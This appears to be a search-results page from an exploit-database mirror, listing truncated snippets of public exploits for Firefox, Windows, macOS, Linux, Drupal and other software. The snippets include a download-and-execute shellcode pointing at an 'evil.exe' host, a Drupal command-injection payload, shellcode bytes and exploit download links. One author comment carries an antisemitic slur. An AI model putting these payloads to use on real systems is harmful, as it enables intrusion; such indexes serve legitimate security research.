22 matches found
Mozilla Firefox (Windows 10 x64) - Full Chain Client Side Attack Exploit
// Axel '0vercl0k' Souchet - November 19 2019 // EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip // 0:000 ? xul!sAutomationPrefIsSet - xul // Evaluate expression: 85724947 = 00000000051c0f13 const XulsAutomationPrefIsSet = 0x051c0f13...
Mozilla Firefox (Windows 10 x64) - Full Chain Client Side Attack
Mozilla Firefox Windows 10 x64 - Full Chain Client Side Attack // Axel '0vercl0k' Souchet - November 19 2019 // EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip // 0:000 ? xul!sAutomationPrefIsSet - xul // Evaluate expression: 8572494...
macOS 18.7.0 Kernel - Local Privilege Escalation
macOS-Kernel-Exploit DISCLAIMER You need to know the KASLR slide to use the exploit. Also SMAP needs to be disabled which means that it's not exploitable on Macs after 2015. These limitations make the exploit pretty much unusable for in-the-wild exploitation but still helpful for security...
Windows/x86 - bitsadmin Download and Execute Shellcode (210 Bytes)
/ ; Windows/x86 - bitsadmin Download and Execute http://192.168.10.10/evil.exe c:\evil.exe Shellcode 210 Bytes ; Shellcode Title : bitsadmin download and execute ; Shellcode Author : Joseph McDonagh ; Date June 26, 2019 ; Shellcode Length 210 ; However, if the application you are exploiting alrea...
Microsoft Windows 8.1 / Server 2012 - Win32k.sys Local Privilege Escalation (MS14-058) Exploit
Exploit for windows platform in category local exploits include "hd.h" // EDB Note Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46945.rar byte scode= 0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 , 0x...
Microsoft Windows 10 (17763.379) - Install DLL Exploit
Exploit for windows platform in category local exploits edit: Figure out how this works for yourself. I can't be bothered. It's a really hard race, doubt anyone will be able to repro anyway. Could be used with malware, you could programmatically trigger the rollback. Maybe you can even pass the...
Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)
There is still a vuln in the code triggered by CVE-2019-0841 The bug that this guy found: https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/ If you create the following: GetFavDirectory gets the local appdata folder, fyi CreateDirectoryGetFavDirectory +...
Microsoft Windows 10 (17763.379) - Install DLL
edit: Figure out how this works for yourself. I can't be bothered. It's a really hard race, doubt anyone will be able to repro anyway. Could be used with malware, you could programmatically trigger the rollback. Maybe you can even pass the silent flag to hide installer UI and find another way to...
Microsoft Windows 10 (17763.379) - Install DLL
Microsoft Windows 10 17763.379 - Install DLL edit: Figure out how this works for yourself. I can't be bothered. It's a really hard race, doubt anyone will be able to repro anyway. Could be used with malware, you could programmatically trigger the rollback. Maybe you can even pass the silent flag ...
Microsoft Internet Explorer 11 - Sandbox Escape
Microsoft Internet Explorer 11 - Sandbox Escape Inject into IE11. Will work on other sandboxes that allow the opening of windows filepickers through a broker. You will gain medium IL javascript execution, at which point you simply retrigger your IE RCE bug. EDB Note Download:...
Microsoft Internet Explorer 11 - Sandbox Escape
Inject into IE11. Will work on other sandboxes that allow the opening of windows filepickers through a broker. You will gain medium IL javascript execution, at which point you simply retrigger your IE RCE bug. EDB Note Download:...
Sony Playstation 3 (PS3) 4.82 - Jailbreak (ROP)
Sony Playstation 3 PS3 4.82 - Jailbreak ROP EDB Note http://ps3xploit.com/help/dumper.html EDB Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44820.zip Dumper Help Warning: Due to the lack of proper checks after exiting the ROP chain, it is possible in...
Transmission - RPC DNS Rebinding
The transmission bittorrent client uses a client/server architecture, the user interface is the client and a daemon runs in the background managing the downloading, seeding, etc. Clients interact with the daemon using JSON RPC requests to a web server listening on port 9091. By default, the daemo...
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution
array "coderupgrade" = array "module" = "color", "files" = array"color.module" , "extensions" = array"module", "items" = array array"olddir"="test; $cmd;", "newdir"="test", "paths" = array "modulesbase" = "../../../", "filesbase" = "../../../../sites/default/files" ; $payload = serialize$a;...
Windows 7 SP1 x86 Privilege Escalation
/ Exploit Title: Elevation of privilege on Windows 7 SP1 x86 Date: 28/06-2016 Exploit Author: @blomster81 Vendor Homepage: www.microsoft.com Version: Windows 7 SP1 x86 Tested on: Windows 7 SP1 x86 CVE : 2016-0400 MS16-014 EoP PoC created from...
Havij Pro - Crash POC Exploit
Exploit for windows platform in category dos / poc !/usr/bin/env python Exploit Title:Havij Pro Crash POC Tested:windows7 Software Link:http://www.itsecteam.com/ Version:1.17 Email:email protected Author:email protected Team run python poc.py copy content to target click Analyze EDB-Note: tested...
Havij Pro - Crash (PoC)
Havij Pro - Crash PoC !/usr/bin/env python Exploit Title:Havij Pro Crash POC Tested:windows7 Software Link:http://www.itsecteam.com/ Version:1.17 Email:[email protected] Author:M1x7e1@Safeye Team run python poc.py copy content to target click Analyze EDB-Note: tested and verified using version 1.6...
Havij Pro - Crash (PoC)
!/usr/bin/env python Exploit Title:Havij Pro Crash POC Tested:windows7 Software Link:http://www.itsecteam.com/ Version:1.17 Email:[email protected] Author:M1x7e1@Safeye Team run python poc.py copy content to target click Analyze EDB-Note: tested and verified using version 1.6 Pro content = “\x41”...
BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP
Exploit for windows platform in category local exploits EDB Note, XPSP3 - my $eip = pack'V',0x7c868667; jmp ESP on kernel32.dll Date: Tue Apr 8 2014 Vendor link: http://www.blazevideo.com/download.htmm Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro App Version: 6.1 Test...
Linux Kernel 2.6.32 3.x (CentOS 56) - PERF_EVENTS Local Privilege Escalation (1)
Linux Kernel 2.6.32 3.x CentOS 56 - PERF_EVENTS Local Privilege Escalation 1 / linux 2.6.37-3.x.x x86_64, 100 LOC gcc-4.6 -O2 semtex.c && ./a.out 2010 [email protected], salut! update may 2013: seems like centos 2.6.32 backported the perf bug, lol. jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if yo...